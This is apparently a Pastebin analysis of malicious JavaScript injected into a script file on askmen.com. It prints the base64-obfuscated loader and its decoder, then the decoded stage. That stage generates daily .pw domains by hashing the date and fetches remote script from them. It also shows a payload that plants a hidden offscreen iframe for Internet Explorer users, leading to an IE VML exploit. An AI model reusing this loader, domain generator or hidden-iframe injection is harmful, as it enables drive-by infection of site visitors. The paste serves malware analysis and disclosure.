Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // JS script at www.askmen.com/includes/js/lib/geoAnalysis.js contains the following JS at the bottom:
- var s = document.createElement("SCR" + "IPT");
- s.text = b64dec("MzM4MjcxNjt2YXIgcXdxd3Fxd3Fxd3F3d3Fxd3d3cXFxcXc9J3FxcXFxcXF3d3d3cXdxcXFxcXd3d3F3d3cnO2Z1bmN0aW9uIGNyY1RhYmxlRygpe3ZhciBjO3ZhciBjcmNUYWJsZSA9IFtdO2Zvcih2YXIgbiA9MDsgbiA8IDI1NjsgbisrKXtjID0gbjtmb3IodmFyIGsgPTA7IGsgPCA4OyBrKyspe2MgPSAoKGMmMSkgPyAoMHhFREI4ODMyMCBeIChjID4+PiAxKSkgOiAoYyA+Pj4gMSkpO31jcmNUYWJsZVtuXSA9IGM7fXJldHVybiBjcmNUYWJsZTt9O2Z1bmN0aW9uIGNyYzMyKHN0cikge3ZhciBjcmNUYWJsZSA9IGNyY1RhYmxlRygpO3ZhciBjcmMgPSAwIF4gKC0xKTtmb3IgKHZhciBpID0gMDsgaSA8IHN0ci5sZW5ndGg7IGkrKyApIHtjcmMgPSAoY3JjID4+PiA4KSBeIGNyY1RhYmxlWyhjcmMgXiBzdHIuY2hhckNvZGVBdChpKSkgJiAweEZGXTt9cmV0dXJuIChjcmMgXiAoLTEpKSA+Pj4gMDt9O3ZhciBkID0gIi09LSI7dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBkYXRlU3RyID0gZGF0ZS5nZXRVVENGdWxsWWVhcigpICsgZCArIChkYXRlLmdldFVUQ01vbnRoKCkrMSkgKyBkICsgZGF0ZS5nZXRVVENEYXRlKCk7d2luZG93LmFybXA9ZnVuY3Rpb24ocCl7dmFyIHMgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdTQ1JJUFQnKTsgcy50ZXh0ID0gYjY0ZGVjKHApLnJlcGxhY2UoL1wwKy8sJycpOyBkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHMpO307dmFyIHMgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdTQ1JJUFQnKTtzLnNyYz0iaHR0cDovLyIgKyBjcmMzMihkYXRlU3RyKS50b1N0cmluZygxNikgKyAiLnB3L2JsZGUuaHRtbD8iK01hdGgucmFuZG9tKCk7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChzKTs=").replace(/\0+/, '');
- document.body.appendChild(s);
- function b64dec(s) {
- var e = {},
- i, k, v = [],
- r = '',
- w = String.fromCharCode;
- var n = [
- [65, 91],
- [97, 123],
- [48, 58],
- [43, 44],
- [47, 48]
- ];
- for (z in n) {
- for (i = n[z][0]; i < n[z][1]; i++) {
- v.push(w(i));
- }
- }
- for (i = 0; i < 64; i++) {
- e[v[i]] = i;
- }
- for (i = 0; i < s.length; i += 72) {
- var b = 0,
- c, x, l = 0,
- o = s.substring(i, i + 72);
- for (x = 0; x < o.length; x++) {
- c = e[o.charAt(x)];
- b = (b << 6) + c;
- l += 6;
- while (l >= 8) {
- r += w((b >>> (l -= 8)) % 256);
- }
- }
- }
- return r;
- }
- // when executed will produce another JS below
- var qwqwqqwqqwqwwqqwwwqqqqw = 'qqqqqqqwwwwqwqqqqqwwwqwww';
- function crcTableG() {
- var c;
- var crcTable = [];
- for (var n = 0; n < 256; n++) {
- c = n;
- for (var k = 0; k < 8; k++) {
- c = ((c & 1) ? (0xEDB88320 ^ (c >>> 1)) : (c >>> 1));
- }
- crcTable[n] = c;
- }
- return crcTable;
- };
- function crc32(str) {
- var crcTable = crcTableG();
- var crc = 0 ^ (-1);
- for (var i = 0; i < str.length; i++) {
- crc = (crc >>> 8) ^ crcTable[(crc ^ str.charCodeAt(i)) & 0xFF];
- }
- return (crc ^ (-1)) >>> 0;
- };
- var d = "-=-";
- var date = new Date();
- var dateStr = date.getUTCFullYear() + d + (date.getUTCMonth() + 1) + d + date.getUTCDate();
- window.armp = function (p) {
- var s = document.createElement('SCRIPT');
- s.text = b64dec(p).replace(/\0+/, '');
- document.body.appendChild(s);
- };
- var s = document.createElement('SCRIPT');
- s.src = "http://" + crc32(dateStr).toString(16) + ".pw/blde.html?" + Math.random();
- document.body.appendChild(s);
- // this JS will generate a URL similar to these
- http://55fd8fe0.pw/blde.html?0.5656226223404374
- http://22fabf76.pw/blde.html?0.3542296437611776
- http://be90becd.pw/nbe.html?0.5180308921262622
- http://9b66653c.pw/nbe.html?0.44849819945207525
- // these links deliver a base64 encrypted JS. Example:
- var ua = navigator.userAgent.toLowerCase();
- if (ua.indexOf("msie") != -1 || ((ua.indexOf("trident") != -1) && (ua.indexOf("rv:11") != -1))) {
- var d = document.createElement('div');
- var f = document.createElement('i' + 'fr' + 'ame');
- f.setAttribute('style', 'width:100px;height:100px;position:absolute;left:-10000px;top:0;');
- f.setAttribute('src', 'http://ushbnasdahfjashdajsdhu.thenettyjostoryorhowilearnedtolovehollywoodland.com/?PHPSSESID=njrMNruDMhzIFIDALOXES7tHNErPThnJkpDZw-4|MzIxNmFjZTA1ZTRkMWI5YmQ0MDZhOTY2NjgyZjU0MWU');
- d.appendChild(f);
- document.body.appendChild(d);
- }
- // and this script will deliver an exploit code. In my case it was IE VML.
Add Comment
Please, Sign In to add comment